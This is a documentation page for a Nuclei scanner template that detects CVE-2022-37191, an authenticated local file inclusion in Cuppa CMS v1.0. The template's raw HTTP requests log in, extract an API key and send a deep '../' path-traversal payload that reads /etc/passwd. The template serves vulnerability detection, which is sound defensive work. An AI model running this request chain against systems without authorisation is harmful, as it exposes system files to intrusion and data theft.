Skip to content
Nuclei Templates

Cuppa CMS v1.0 - Authenticated Local File Inclusion

ID: CVE-2022-37191

Severity: medium

Author: theamanrawat

Tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms

Description

Section titled “Description”

The component “cuppa/api/index.php” of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.

YAML Source

Section titled “YAML Source”
id: CVE-2022-37191


info:
  name: Cuppa CMS v1.0 - Authenticated Local File Inclusion
  author: theamanrawat
  severity: medium
  description: |
    The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37191
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-37191
    cwe-id: CWE-829
    epss-score: 0.39013
    epss-percentile: 0.97239
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms


http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /components/table_manager/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8


        path=component%2Ftable_manager%2Fview%2Fcu_api_keys
      - |
        POST /api/index.php HTTP/1.1
        Host: {{Hostname}}
        key: {{apikey}}
        Content-Type: application/x-www-form-urlencoded


        function=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/


    matchers-condition: and
    matchers:
      - type: word
        part: header_3
        words:
          - "text/html"


      - type: regex
        part: body_3
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: apikey
        group: 1
        regex:
          - "<td class='td_key'>(.*?)</td>"
        internal: true
# digest: 4a0a00473045022100f10d47e51f86649e5a44b2f5dcd67b2ad53131483856f56d92eab7a1aadeed91022065e578e0113a96bb8d4752560cba2648ef5e454a12e68344acea68fd496bce57:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-37191.yaml"

View on Github